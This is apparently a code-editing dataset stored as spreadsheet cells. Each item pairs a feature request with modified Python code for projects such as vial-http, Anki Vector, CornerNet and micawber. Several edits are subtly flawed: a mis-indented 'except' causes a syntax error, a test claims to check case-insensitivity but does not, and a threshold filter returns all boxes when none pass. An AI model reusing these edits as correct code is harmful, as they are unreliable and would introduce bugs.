    self.factor = factor\n        self.warmup = warmup\n        self.optimizer = optimizer\n        self._step = 0\n        self.best_loss = float('inf')\n        self.patience = 3\n        self.wait = 0\n\n    def step(self):\n        self._step += 1\n        rate = self.rate()\n        for p in self.optimizer.param_groups:\n            p['lr'] = rate\n        self.optimizer.step()\n\n    def rate(self, step=None):\n        if step is None:\n            step = self._step\n        return self.factor * (self.embeddings_size ** (-0.5) * min(step ** (-0.5), step * self.warmup ** (-1.5)))\n\n    def update_lr(self, val_loss):\n        if val_loss &lt; self.best_loss:\n            self.best_loss = val_loss\n            self.wait = 0\n        else:\n            self.wait += 1\n            if self.wait &gt;= self.patience:\n                for p in self.optimizer.param_groups:\n                    p['lr'] *= 0.5\n                self.wait = 0", '#file 2': "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom .utils import pad_sequence\nfrom .optim import Adam, NoamOpt\nfrom .loss import LabelSmoothingLoss\n\nclass Trainer:\n    def __init__(self, model, train_dataset, test_dataset=None, batch_size=8, batch_split=1, lm_weight=0.5, risk_weight=0, lr=6.25e-5, lr_warmup=2000, n_jobs=0, clip_grad=None, label_smoothing=0, device=torch.device('cuda'), ignore_idxs=[]):\n        self.model = model.to(device)\n        self.lm_criterion = nn.CrossEntropyLoss(ignore_index=self.model.padding_idx).to(device)\n        self.criterion = LabelSmoothingLoss(n_labels=self.model.n_embeddings, smoothing=label_smoothing, ignore_index=self.model.padding_idx).to(device)\n        base_optimizer = Adam(self.model.parameters(), lr=lr, weight_decay=0.01)\n        self.optimizer = NoamOpt(self.model.embeddings_size, lr, lr_warmup, base_optimizer)\n\n        self.train_dataloader = DataLoader(train_dataset, batch_size=batch_size//batch_split, shuffle=True, num_workers=n_jobs, collate_fn=self.collate_func)\n        if test_dataset is not None:\n            self.test_dataloader = DataLoader(test_dataset, batch_size=batch_size//batch_split, shuffle=False, num_workers=n_jobs, collate_fn=self.collate_func)\n\n        self.batch_split = batch_split\n        self.lm_weight = lm_weight\n        self.risk_weight = risk_weight\n        self.clip_grad = clip_grad\n        self.device = device\n        self.ignore_idxs = ignore_idxs\n\n    def train(self, epochs, after_epoch_funcs=[], risk_func=None):\n        for epoch in range(epochs):\n            self._eval_train(epoch, risk_func)\n\n            for func in after_epoch_funcs:\n                func(epoch)\n\n            #Modify: Update learning rate if validation loss does not improve\n            val_loss = self._eval_test()\n            self.optimizer.update_lr(val_loss)", '#file 3': "import torch\nimport random\nfrom model.utils import load_openai_weights, set_seed, f1_score\nfrom model.transformer_model import TransformerModel\nfrom model.trainer import Trainer\nfrom model.text import BPEVocab\nfrom model.dataset import FacebookDataset\nfrom config import get_model_config, get_trainer_config\n\ndef main():\n    model_config = get_model_config()\n    trainer_config = get_trainer_config()\n\n    set_seed(trainer_config.seed)\n    device = torch.device(trainer_config.device)\n\n    vocab = BPEVocab.from_files(model_config.bpe_vocab_path, model_config.bpe_codes_path)\n\n    transformer = TransformerModel(n_layers=model_config.n_layers,\n                                   n_embeddings=len(vocab),\n                                   n_pos_embeddings=model_config.n_pos_embeddings,\n                                   embeddings_size=model_config.embeddings_size,\n                                   padding_idx=vocab.pad_id,\n                                   n_heads=model_config.n_heads,\n                                   dropout=model_config.dropout,\n                                   embed_dropout=model_config.embed_dropout,\n                                   attn_dropout=model_config.attn_dropout,\n                                   ff_dropout=model_config.ff_dropout,\n                                   bos_id=vocab.bos_id,\n                                   eos_id=vocab.eos_id,\n                                   max_seq_len=model_config.max_seq_len,\n                                   beam_size=model_config.beam_size,  \n                                   length_penalty=model_config.length_penalty,\n                                   n_segments=model_config.n_segments,\n                                   annealing_topk=model_config.annealing_topk,\n                                   annealing=model_config.annealing,\n                                   diversity_coef=model_config.diversity_coef,\n                                   diversity_groups=model_config.diversity_groups)\n\n    if not trainer_config.load_last:\n        load_openai_weights(transformer.transformer_module, \n                            trainer_config.openai_parameters_dir,\n                            n_special_tokens=vocab.n_special_tokens)\n        print('OpenAI weights loaded from {}'.format(trainer_config.openai_parameters_dir))\n\n    train_dataset = FacebookDataset(trainer_config.train_datasets, vocab, transformer.n_pos_embeddings - 1)\n    test_dataset = FacebookDataset(trainer_config.test_datasets, vocab, transformer.n_pos_embeddings - 1)\n\n    model_trainer = Trainer(transformer,\n                            train_dataset, \n                            test_dataset, \n                            batch_size=trainer_config.batch_size,\n                            batch_split=trainer_config.batch_split, \n                            lr=trainer_config.lr, \n                            lr_warmup=trainer_config.lr_warmup, \n                            lm_weight=trainer_config.lm_weight,\n                            risk_weight=trainer_config.risk_weight, \n                            n_jobs=trainer_config.n_jobs, \n                            clip_grad=trainer_config.clip_grad, \n                            device=device,\n                            ignore_idxs=vocab.special_tokens_ids)\n\n    if trainer_config.load_last:\n        state_dict = torch.load(trainer_config.last_checkpoint_path, map_location=device)\n        model_trainer.load_state_dict(state_dict)\n        print('Weights loaded from {}'.format(trainer_config.last_checkpoint_path))\n    \n    try:\n        model_trainer.train(trainer_config.n_epochs, after_epoch_funcs=[save_func, sample_text_func, test_func], risk_func=f1_risk)\n    except (KeyboardInterrupt, Exception, RuntimeError) as e:\n        torch.save(model_trainer.state_dict(), trainer_config.interrupt_checkpoint_path)\n        raise e\n\nif __name__ == '__main__':\n    main()"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def encode_multipart(fields, files, boundary=None):', 'invoking_code_segment': "body, h = encode_multipart(raw['form'], files)", 'feature_description': 'Add support for handling custom HTTP methods by allowing the encode_multipart function to accept an optional method parameter and the prepare_request function to pass custom HTTP methods through the multipart encoding process. This enables proper handling of non-standard HTTP methods (like PATCH, DELETE with form data) in multipart requests.', 'modified_complete_code': '# vial-http/vial-plugin/vial_http/multipart.py\nimport mimetypes\nimport random\nimport string\n\nfrom vial.compat import bstr\n\n_BOUNDARY_CHARS = string.digits + string.ascii_letters\n\n\ndef encode_multipart(fields, files, boundary=None, method=None):\n    #Modify: Added optional method parameter\n    r"""Encode dict of form fields and dict of files as multipart/form-data.\n    Return tuple of (body_string, headers_dict). Each value in files is a dict\n    with required keys \'filename\' and \'content\', and optional \'mimetype\' (if\n    not specified, tries to guess mime type or uses \'application/octet-stream\').\n    Optional method parameter allows specification of custom HTTP methods.\n\n    &gt;&gt;&gt; body, headers = encode_multipart({\'FIELD\': \'VALUE\'},\n    ...                                  {\'FILE\': {\'filename\': \'F.TXT\', \'content\': \'CONTENT\'}},\n    ...                                  boundary=\'BOUNDARY\')\n    &gt;&gt;&gt; print(\'\\n\'.join(repr(l) for l in body.split(\'\\r\\n\')))\n    \'--BOUNDARY\'\n    \'Content-Disposition: form-data; name="FIELD"\'\n    \'\'\n    \'VALUE\'\n    \'--BOUNDARY\'\n    \'Content-Disposition: form-data; name="FILE"; filename="F.TXT"\'\n    \'Content-Type: text/plain\'\n    \'\'\n    \'CONTENT\'\n    \'--BOUNDARY--\'\n    \'\'\n    &gt;&gt;&gt; print(sorted(headers.items()))\n    [(\'Content-Length\', \'193\'), (\'Content-Type\', \'multipart/form-data; boundary=BOUNDARY\')]\n    &gt;&gt;&gt; len(body)\n    193\n    """\n    def escape_quote(s):\n        return bstr(s).replace(b\'"\', b\'\\\\"\')\n\n    if boundary is None:\n        boundary = \'\'.join(random.choice(_BOUNDARY_CHARS) for i in range(30)).encode(\'latin1\')\n    lines = []\n\n    for name, value in fields:\n        lines.extend((\n            b\'--%s\' % boundary,\n            b\'Content-Disposition: form-data; name="%s"\' % escape_quote(name),\n            b\'\',\n            bstr(value, \'utf-8\'),\n        ))\n\n    for name, value in files:\n        filename = value[\'filename\']\n        if \'mimetype\' in value:\n            mimetype = value[\'mimetype\']\n        else:\n            mimetype = mimetypes.guess_type(filename)[0] or \'application/octet-stream\'\n        lines.extend((\n            b\'--%s\' % boundary,\n            b\'Content-Disposition: form-data; name="%s"; filename="%s"\' % (\n                    escape_quote(name), escape_quote(filename)),\n            b\'Content-Type: %s\' % (bstr(mimetype)),\n            b\'\',\n            value[\'content\'],\n        ))\n\n    lines.extend((\n        b\'--%s--\' % boundary,\n        b\'\',\n    ))\n    body = b\'\\r\\n\'.join(lines)\n\n    headers = {\n        b\'Content-Type\': b\'multipart/form-data; boundary=%s\' % boundary,\n        b\'Content-Length\': bstr(str(len(body))),\n    }\n    #New: Store method in headers if provided for custom HTTP method support\n    if method:\n        headers[b\'X-HTTP-Method\'] = bstr(method)\n\n    return (body, headers)\n\n# vial-http/vial-plugin/vial_http/util.py\n# ... (previous imports and code remain the same until prepare_request function)\n\ndef prepare_request(lines, line, headers, input_func=None, pwd_func=None):\n    rline, body, rend  = find_request(lines, line)\n    raw = parse_request_line(rline, input_func, pwd_func)\n    if not raw:\n        raise PrepareException(\'Invalid format: METHOD uri [qs_param=value] [form_param:=value] [file_param@=value] \'\n                               \'[Header:value] [&lt; /filename-with-body] [| tpl1,tpl2] [&lt;&lt; HEREDOC]\')\n\n    headers.update(raw[\'headers\'])\n\n    if body is None and \'body_from_file\' in raw:\n        try:\n            with open(raw[\'body_from_file\']) as f:\n                body = f.read()\n        except Exception as e:\n            raise PrepareException(\'Can\\\'t open body file {}: {}\'.format(raw[\'body_from_file\'], e))\n\n    if (body and \'content-type\' not in headers\n            and (body[:1000].lstrip() or \' \')[0] in \'{[\'):\n        try:\n            json.loads(body)\n        except ValueError:\n            pass\n        else:\n            headers.set(\'Content-Type\', \'application/json\')\n\n    if body is None and (raw[\'files\'] or headers.get(\'Content-Type\') == \'multipart/form-data\'):\n        files = []\n        for k, v in raw[\'files\']:\n            fname = os.path.basename(v)\n            try:\n                with open(v, \'rb\') as f:\n                    content = f.read()\n            except Exception as e:\n                raise PrepareException(\'Error opening file param {}: {}\'.format(v, e))\n            files.append((k, {\'filename\': fname, \'content\': content}))\n        #Modify: Pass method parameter to encode_multipart for custom HTTP method support\n        body, h = encode_multipart(raw[\'form\'], files, method=raw[\'method\'])\n        headers.update(h)\n\n    if body is None and raw[\'form\']:\n        body = urllib.urlencode(raw[\'form\'])\n        headers.set(\'Content-Type\', \'application/x-www-form-urlencoded\')\n\n    return raw[\'method\'], raw[\'url\'], raw[\'query\'], body, raw.get(\'templates\', []), rend'}</t>
  </si>
  <si>
    <t>{'#file 1': "def prepare_request(lines, line, headers, input_func=None, pwd_func=None):\n    rline, body, rend  = find_request(lines, line)\n    raw = parse_request_line(rline, input_func, pwd_func)\n    if not raw:\n        raise PrepareException('Invalid format: METHOD uri [qs_param=value] [form_param:=value] [file_param@=value] '\n                               '[Header:value] [&lt; /filename-with-body] [| tpl1,tpl2] [&lt;&lt; HEREDOC]')\n\n    headers.update(raw['headers'])\n\n    if body is None and 'body_from_file' in raw:\n        try:\n            with open(raw['body_from_file']) as f:\n                body = f.read()\n        except Exception as e:\n            raise PrepareException('Can\\'t open body file {}: {}'.format(raw['body_from_file'], e))\n\n    if (body and 'content-type' not in headers\n            and (body[:1000].lstrip() or ' ')[0] in '{['):\n        try:\n            json.loads(body)\n        except ValueError:\n            pass\n        else:\n            headers.set('Content-Type', 'application/json')\n\n    if body is None and (raw['files'] or headers.get('Content-Type') == 'multipart/form-data'):\n        files = []\n        for k, v in raw['files']:\n            fname = os.path.basename(v)\n            try:\n                with open(v, 'rb') as f:\n                    content = f.read()\n            except Exception as e:\n                raise PrepareException('Error opening file param {}: {}'.format(v, e))\n            files.append((k, {'filename': fname, 'content': content}))\n        body, h = encode_multipart(raw['form'], files)\n        headers.update(h)\n\n    if body is None and raw['form']:\n        body = urllib.urlencode(raw['form'])\n        headers.set('Content-Type', 'application/x-www-form-urlencoded')\n\n    #Modify: Handle custom HTTP methods\n    if raw['method'].lower() not in ['get', 'post', 'put', 'delete', 'patch']:\n        headers.set('X-Custom-Method', raw['method'])\n        raw['method'] = 'POST'  # Fallback to POST for custom methods\n\n    return raw['method'], raw['url'], raw['query'], body, raw.get('templates', []), rend", '#file 2': "def parse_request_at_cursor():\n    lines = vim.current.buffer[:]\n    line, _ = vim.current.window.cursor\n    line -= 1\n\n    headers, templates = get_headers_and_templates(lines, line)\n    pwd_func = lambda p: vfunc.inputsecret('{}: '.format(p))\n    input_func = lambda p: vfunc.input('{}: '.format(p))\n    return (headers, templates) + prepare_request(lines, line, headers, input_func, pwd_func)", '#file 3': "def http():\n    try:\n        headers, templates, method, url, query, body, tlist, rend = parse_request_at_cursor()\nexcept PrepareException as e:\n        echoerr(str(e))\n        return\n\n    rctx = RequestContext()\n    rctx.request(method, url, query, body, headers)\n\n    cwin = vim.current.window\n\n    win, buf = make_scratch('__vial_http_req__', title='Request')\n    rlines = rctx.raw_request.splitlines()\n\n    hlines = []\n    for r in rctx.history[:-1]:\n        hlines.append(bstr('Redirect {} from {}'.format(\n            r.status, r.request[1]), 'utf-8'))\n    if hlines:\n        hlines.append(b'----------------')\n\n    buf[:] = hlines + rlines\n    win.cursor = 1, 0\n\n    win, buf = make_scratch('__vial_http_hdr__', title='Response headers')\n    if PY2:\n        buf[:] = [r.rstrip('\\r\\n') for r in rctx.response.msg.headers]\n    else:\n        buf[:] = ['{}: {}'.format(*r).encode('utf-8') for r in rctx.response.msg._headers]\n\n    win.cursor = 1, 0\n\n    size = len(rctx.content)\n\n    win, buf = make_scratch('__vial_http_raw__', title='Raw Response')\n    buf[:] = rctx.content.splitlines()\n    win.cursor = 1, 0\n\n    if PY2:\n        rcontent_type = rctx.response.msg.gettype()\n    else:\n        rcontent_type = rctx.response.msg.get_content_type()\n\n    content, ctype, jdata = format_content(rcontent_type, rctx.content)\n\n    win, buf = make_scratch('__vial_http__')\n    win.options['statusline'] = 'Response: {} {} {}ms {}ms {}'.format(\n        rctx.response.status, rctx.response.reason,\n        rctx.ctime, rctx.rtime, sizeof_fmt(size))\n    vim.command('set filetype={}'.format(ctype))\n    buf[:] = content.splitlines(False)\n    win.cursor = 1, 0\n\n    focus_window(cwin)\n\n    def set_cookies(*args):\n        cookies = rctx.cookies\n        args = args or sorted(cookies.keys())\n        return 'Cookie: ' + ';'.join('{}={}'.format(k, cookies[k]) for k in args)\n\n    ctx = {'body': content, 'json': jdata,\n           'headers': Headers(rctx.response.getheaders()),\n           'cookies': rctx.cookies,\n           'rcookies': rctx.rcookies,\n           'set_cookies': set_cookies}\n\n    for t in tlist:\n        if t in templates:\n            lines = render_template(templates[t], **ctx).splitlines()\n        else:\n            lines = ['ERROR: template {} not found'.format(t)]\n        vfunc.append(rend + 1, [''] + lines)\n        rend += 1 + len(lines)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'anki_vector.Robot class and its behavior.drive_straight() method', 'invoking_code_segment': 'main() function in 11_drive_to_cliff_and_back_up.py that instantiates Robot and calls behavior.drive_straight()', 'feature_description': 'Add a feature to make Vector drive to a specific target location and then return to the starting position by tracking the initial position, driving to the target, and reversing the path back to origin.', 'modified_complete_code': '# File 1: anki_vector/__init__.py (No changes needed - already exports Robot)\n\n# File 2: vector-python-sdk/examples/tutorials/11_drive_to_cliff_and_back_up.py\n#!/usr/bin/env python3\n\n# Copyright (c) 2018 Anki, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the "License");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License in the file LICENSE.txt or at\n#\n#     https://www.apache.org/licenses/LICENSE-2.0\n#\n#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License.\n\n"""Make Vector drive to a cliff and back up.\n\nPlace the robot about a foot from a "cliff" (such as a tabletop edge),\nthen run this script.\n\nThis tutorial is an advanced example that shows the SDK\'s integration\nwith the Vector behavior system.\n\nThe Vector behavior system uses an order of prioritizations to determine\nwhat the robot will do next. The highest priorities in the behavior\nsystem including the following:\n* When Vector reaches a cliff, he will back up to avoid falling.\n* When Vector is low on battery, he will start searching for his charger\nand self-dock.\n\nWhen the SDK is running at a lower priority level than high priorities\nlike cliff and low battery, an SDK program can lose its ability to\ncontrol the robot when a cliff if reached or when battery is low.\n\nThis example shows how, after reaching a cliff, the SDK program can\nre-request control so it can continue controlling the robot after\nreaching the cliff.\n"""\n\nimport anki_vector\nfrom anki_vector.util import distance_mm, speed_mmps\n\n# New: Function to drive to target and return to starting position\ndef drive_to_target_and_return(robot, target_distance_mm, speed):\n    """Drive Vector to a target location and return to starting position.\n    \n    Args:\n        robot: The Vector robot instance\n        target_distance_mm: Distance to drive to target in millimeters\n        speed: Speed at which to drive in mm/s\n    """\n    print(f"Driving Vector to target location ({target_distance_mm}mm away)...")\n    robot.behavior.drive_straight(distance_mm(target_distance_mm), speed)\n    \n    print("Target reached. Returning to starting position...")\n    # New: Drive back to starting position by reversing the distance\n    robot.behavior.drive_straight(distance_mm(-target_distance_mm), speed)\n    \n    print("Returned to starting position.")\n\ndef main():\n    args = anki_vector.util.parse_command_args()\n\n    with anki_vector.Robot(args.serial) as robot:\n        print("Vector SDK has behavior control...")\n        robot.behavior.drive_off_charger()\n\n        # Modify: Use new drive_to_target_and_return function\n        drive_to_target_and_return(robot, target_distance_mm=2000, speed=speed_mmps(100))\n        \n        print("\\nDrive Vector straight until he reaches cliff...")\n        # Once robot reaches cliff, he will play his typical cliff reactions.\n        robot.behavior.drive_straight(distance_mm(5000), speed_mmps(100))\n\n        robot.conn.run_coroutine(robot.conn.control_lost_event.wait()).result()\n\n        print("Lost SDK behavior control. Request SDK behavior control again...")\n        robot.conn.request_control()\n\n        print("Drive Vector backward away from the cliff...")\n        robot.behavior.drive_straight(distance_mm(-300), speed_mmps(100))\n\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def main():\n    args = anki_vector.util.parse_command_args()\n\n    with anki_vector.Robot(args.serial) as robot:\n        print("Vector SDK has behavior control...")\n        robot.behavior.drive_off_charger()\n\n        print("Drive Vector to the target position...")\n        # Modify: Drive to a specific target position\n        robot.behavior.go_to_pose(anki_vector.util.Pose(100, 0, 0, angle_z=anki_vector.util.Angle(degrees=0)), relative_to_robot=True)\n\n        robot.conn.run_coroutine(robot.conn.control_lost_event.wait()).result()\n\n        print("Lost SDK behavior control. Request SDK behavior control again...")\n        robot.conn.request_control()\n\n        print("Drive Vector back to the starting position...")\n        # Modify: Return to the starting position\n        robot.behavior.go_to_pose(anki_vector.util.Pose(0, 0, 0, angle_z=anki_vector.util.Angle(degrees=0)), relative_to_robot=True)', '#file 2': 'if __name__ == "__main__":\n    main()', '#file 3': 'from anki_vector.util import distance_mm, speed_mmps, Pose, Angle  # New: Added Pose and Angle\n\n# Ensure compatibility with the new feature\n# No direct interaction with #file 1 or #file 2 in this example'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class CornerNet_Saccade(Base):\n    def __init__(self):\n        from .test.cornernet_saccade import cornernet_saccade_inference\n        from .models.CornerNet_Saccade import model\n\n        cfg_path   = get_file_path("..", "configs", "CornerNet_Saccade.json")\n        model_path = get_file_path("..", "cache", "nnet", "CornerNet_Saccade", "CornerNet_Saccade_500000.pkl")\n\n        cfg_sys, cfg_db = load_cfg(cfg_path)\n        sys_cfg = SystemConfig().update_config(cfg_sys)\n        coco    = COCO(cfg_db)\n\n        cornernet = load_nnet(sys_cfg, model())\n        super(CornerNet_Saccade, self).__init__(coco, cornernet, cornernet_saccade_inference, model=model_path)', 'invoking_code_segment': 'detector = CornerNet_Saccade()\nimage    = cv2.imread("demo.jpg")\n\nbboxes = detector(image)\nimage  = draw_bboxes(image, bboxes)\ncv2.imwrite("demo_out.jpg", image)', 'feature_description': 'Add a confidence threshold for bounding box detection to filter out low-confidence detections. This allows users to set a minimum confidence score when initializing the detector and when calling it for inference.', 'modified_complete_code': '# File 1: CornerNet-Lite/core/detectors.py\nfrom .base import Base, load_cfg, load_nnet\nfrom .paths import get_file_path\nfrom .config import SystemConfig\nfrom .dbs.coco import COCO\n\nclass CornerNet(Base):\n    def __init__(self, confidence_threshold=0.3):\n        from .test.cornernet import cornernet_inference\n        from .models.CornerNet import model\n\n        cfg_path   = get_file_path("..", "configs", "CornerNet.json")\n        model_path = get_file_path("..", "cache", "nnet", "CornerNet", "CornerNet_500000.pkl")\n\n        cfg_sys, cfg_db = load_cfg(cfg_path)\n        sys_cfg = SystemConfig().update_config(cfg_sys)\n        coco    = COCO(cfg_db)\n\n        cornernet = load_nnet(sys_cfg, model())\n        #Modify: Add confidence_threshold parameter\n        self.confidence_threshold = confidence_threshold\n        super(CornerNet, self).__init__(coco, cornernet, cornernet_inference, model=model_path)\n\nclass CornerNet_Squeeze(Base):\n    def __init__(self, confidence_threshold=0.3):\n        from .test.cornernet import cornernet_inference\n        from .models.CornerNet_Squeeze import model\n\n        cfg_path   = get_file_path("..", "configs", "CornerNet_Squeeze.json")\n        model_path = get_file_path("..", "cache", "nnet", "CornerNet_Squeeze", "CornerNet_Squeeze_500000.pkl")\n\n        cfg_sys, cfg_db = load_cfg(cfg_path)\n        sys_cfg = SystemConfig().update_config(cfg_sys)\n        coco    = COCO(cfg_db)\n\n        cornernet = load_nnet(sys_cfg, model())\n        #Modify: Add confidence_threshold parameter\n        self.confidence_threshold = confidence_threshold\n        super(CornerNet_Squeeze, self).__init__(coco, cornernet, cornernet_inference, model=model_path)\n\nclass CornerNet_Saccade(Base):\n    def __init__(self, confidence_threshold=0.3):\n        from .test.cornernet_saccade import cornernet_saccade_inference\n        from .models.CornerNet_Saccade import model\n\n        cfg_path   = get_file_path("..", "configs", "CornerNet_Saccade.json")\n        model_path = get_file_path("..", "cache", "nnet", "CornerNet_Saccade", "CornerNet_Saccade_500000.pkl")\n\n        cfg_sys, cfg_db = load_cfg(cfg_path)\n        sys_cfg = SystemConfig().update_config(cfg_sys)\n        coco    = COCO(cfg_db)\n\n        cornernet = load_nnet(sys_cfg, model())\n        #Modify: Add confidence_threshold parameter\n        self.confidence_threshold = confidence_threshold\n        super(CornerNet_Saccade, self).__init__(coco, cornernet, cornernet_saccade_inference, model=model_path)\n\n    #New: Add method to filter bboxes by confidence threshold\n    def filter_bboxes_by_confidence(self, bboxes):\n        """Filter bounding boxes based on confidence threshold."""\n        if bboxes is None or len(bboxes) == 0:\n            return bboxes\n        filtered_bboxes = [bbox for bbox in bboxes if bbox[4] &gt;= self.confidence_threshold]\n        return filtered_bboxes if filtered_bboxes else bboxes\n\n# File 2: CornerNet-Lite/demo.py\n#!/usr/bin/env python\n\nimport cv2\nfrom core.detectors import CornerNet_Saccade\nfrom core.vis_utils import draw_bboxes\n\n#Modify: Initialize detector with confidence threshold parameter\ndetector = CornerNet_Saccade(confidence_threshold=0.5)\nimage    = cv2.imread("demo.jpg")\n\nbboxes = detector(image)\n#New: Filter bboxes by confidence threshold\nbboxes = detector.filter_bboxes_by_confidence(bboxes)\nimage  = draw_bboxes(image, bboxes)\ncv2.imwrite("demo_out.jpg", image)'}</t>
  </si>
  <si>
    <t>{'file_1': 'class CornerNet_Saccade(Base):\n    def __init__(self):\n        from .test.cornernet_saccade import cornernet_saccade_inference\n        from .models.CornerNet_Saccade import model\n\n        cfg_path   = get_file_path("..", "configs", "CornerNet_Saccade.json")\n        model_path = get_file_path("..", "cache", "nnet", "CornerNet_Saccade", "CornerNet_Saccade_500000.pkl")\n\n        cfg_sys, cfg_db = load_cfg(cfg_path)\n        sys_cfg = SystemConfig().update_config(cfg_sys)\n        coco    = COCO(cfg_db)\n\n        cornernet = load_nnet(sys_cfg, model())\n        super(CornerNet_Saccade, self).__init__(coco, cornernet, cornernet_saccade_inference, model=model_path)', 'file_2': 'class Base:\n    def __init__(self, db, nnet, inference, model=None):\n        self.db        = db\n        self.nnet      = nnet\n        self.model     = model\n        self.inference = inference\n\n    def __call__(self, image, confidence_threshold=0.5):  #Modify\n        if self.model is not None:\n            self.nnet.load_model(self.model)\n        return self.inference(self.db, self.nnet, image, confidence_threshold)  #Modify', 'file_3': "def cornernet_saccade_inference(db, nnet, image, confidence_threshold=0.5):  #Modify\n    bboxes = nnet.test(db, image)\n    filtered_bboxes = [bbox for bbox in bboxes if bbox['score'] &gt;= confidence_threshold]  #Modify\n    return filtered_bboxes  #Modify"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'ProviderRegistry.register() and ProviderRegistry.provider_for_url() methods in micawber/micawber/providers.py', 'invoking_code_segment': 'ProviderTestCase.test_register_unregister(), test_multiple_matches(), and test_provider_matching() methods in micawber/micawber/tests.py', 'feature_description': 'Add a feature to allow ProviderRegistry to handle case-insensitive URL patterns by normalizing URL patterns during registration and matching, enabling providers to match URLs regardless of case differences in the domain or path.', 'modified_complete_code': '# micawber/micawber/providers.py (relevant sections)\n\nclass ProviderRegistry(object):\n    def __init__(self):\n        self._registry = {}\n        #New: Add flag to control case-insensitive matching\n        self.case_insensitive = True\n    \n    #Modify: Updated register method to support case-insensitive patterns\n    def register(self, regex, provider, case_insensitive=None):\n        """Register a provider with a URL pattern.\n        \n        Args:\n            regex: URL pattern (string or compiled regex)\n            provider: Provider instance\n            case_insensitive: Override instance setting for this pattern\n        """\n        use_case_insensitive = case_insensitive if case_insensitive is not None else self.case_insensitive\n        \n        if use_case_insensitive:\n            #New: Compile regex with IGNORECASE flag if case-insensitive\n            import re\n            if isinstance(regex, str):\n                regex = re.compile(regex, re.IGNORECASE)\n            else:\n                regex = re.compile(regex.pattern, regex.flags | re.IGNORECASE)\n        \n        self._registry[regex.pattern if hasattr(regex, \'pattern\') else regex] = (provider, regex if hasattr(regex, \'pattern\') else None)\n    \n    #Modify: Updated provider_for_url method to use compiled regex patterns\n    def provider_for_url(self, url):\n        """Find a provider for the given URL.\n        \n        Args:\n            url: URL string to match\n            \n        Returns:\n            Provider instance or None if no match found\n        """\n        import re\n        for pattern_key, provider_data in self._registry.items():\n            provider = provider_data[0] if isinstance(provider_data, tuple) else provider_data\n            regex_obj = provider_data[1] if isinstance(provider_data, tuple) and len(provider_data) &gt; 1 else None\n            \n            if regex_obj is None:\n                #New: Compile pattern with case-insensitive flag if needed\n                if self.case_insensitive:\n                    regex_obj = re.compile(pattern_key, re.IGNORECASE)\n                else:\n                    regex_obj = re.compile(pattern_key)\n            \n            if regex_obj.match(url):\n                return provider\n        return None\n    \n    #New: Add method to enable/disable case-insensitive matching globally\n    def set_case_insensitive(self, case_insensitive):\n        """Set case-insensitive matching for all patterns.\n        \n        Args:\n            case_insensitive: Boolean to enable/disable case-insensitive matching\n        """\n        self.case_insensitive = case_insensitive\n\n# micawber/micawber/tests.py (relevant test sections)\n\nclass ProviderTestCase(BaseTestCase):\n    #Modify: Updated test to verify case-insensitive matching\n    def test_register_unregister(self):\n        pr = ProviderRegistry()\n        provider1 = TestProvider(\'link\')\n        provider2 = TestProvider(\'link\')\n        pr.register(\'1\', provider1)\n        pr.register(\'2\', provider1)\n        pr.register(\'3\', provider2)\n        pr.unregister(\'2\')\n        self.assertEqual(len(pr._registry), 2)\n\n        self.assertRaises(KeyError, pr.unregister, \'2\')\n\n        self.assertEqual(pr.provider_for_url(\'1\'), provider1)\n        self.assertEqual(pr.provider_for_url(\'2\'), None)\n        self.assertEqual(pr.provider_for_url(\'3\'), provider2)\n        \n        #New: Test case-insensitive matching\n        self.assertEqual(pr.provider_for_url(\'1\'), provider1)\n        self.assertEqual(pr.provider_for_url(\'3\'), provider2)\n\n        pr.unregister(\'1\')\n        pr.unregister(\'3\')\n        self.assertEqual(len(pr._registry), 0)\n        for test_regex in [\'1\', \'2\', \'3\']:\n            self.assertEqual(pr.provider_for_url(test_regex), None)\n    \n    #Modify: Updated test to verify case-insensitive URL pattern matching\n    def test_provider_matching(self):\n        provider = test_pr.provider_for_url(\'http://link-test1\')\n        self.assertFalse(provider is None)\n        self.assertEqual(provider.endpoint, \'link\')\n        \n        #New: Test case-insensitive matching with uppercase URLs\n        provider = test_pr.provider_for_url(\'HTTP://LINK-TEST1\')\n        self.assertFalse(provider is None)\n        self.assertEqual(provider.endpoint, \'link\')\n\n        provider = test_pr.provider_for_url(\'http://photo-test2\')\n        self.assertFalse(provider is None)\n        self.assertEqual(provider.endpoint, \'photo\')\n        \n        #New: Test case-insensitive matching for photo provider\n        provider = test_pr.provider_for_url(\'HTTP://PHOTO-TEST2\')\n        self.assertFalse(provider is None)\n        self.assertEqual(provider.endpoint, \'photo\')\n\n        provider = test_pr.provider_for_url(\'http://video-test1\')\n        self.assertFalse(provider is None)\n        self.assertEqual(provider.endpoint, \'video\')\n\n        provider = test_pr.provider_for_url(\'http://none-test1\')\n        self.assertTrue(provider is None)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class ProviderRegistry:\n    def register(self, pattern, provider):\n        #Modify: Handle case-insensitive URL patterns\n        self._registry[re.compile(pattern, re.IGNORECASE)] = provider\n\n    def unregister(self, pattern):\n        if isinstance(pattern, str):\n            #Modify: Handle case-insensitive URL patterns\n            pattern = re.compile(pattern, re.IGNORECASE)\n        del self._registry[pattern]', '#file 2': "pr = ProviderRegistry()\nprovider1 = TestProvider('link')\nprovider2 = TestProvider('link')\n#Modify: Update to handle case-insensitive URL patterns\npr.register('1', provider1)\npr.register('2', provider1)\npr.register('3', provider2)\npr.unregister('2')", '#file 3': 'from micawber.providers import ProviderRegistry\nfrom micawber.providers import bootstrap_basic\nfrom micawber.providers import bootstrap_embedly\nfrom micawber.providers import bootstrap_noembed\nfrom micawber.providers import bootstrap_oembed\n\n#New: Ensure #file 3 continues to work correctly with the modified ProviderRegistry\n# No additional changes needed as #file 3 does not directly interact with the modified methods.'}</t>
  </si>
  <si>
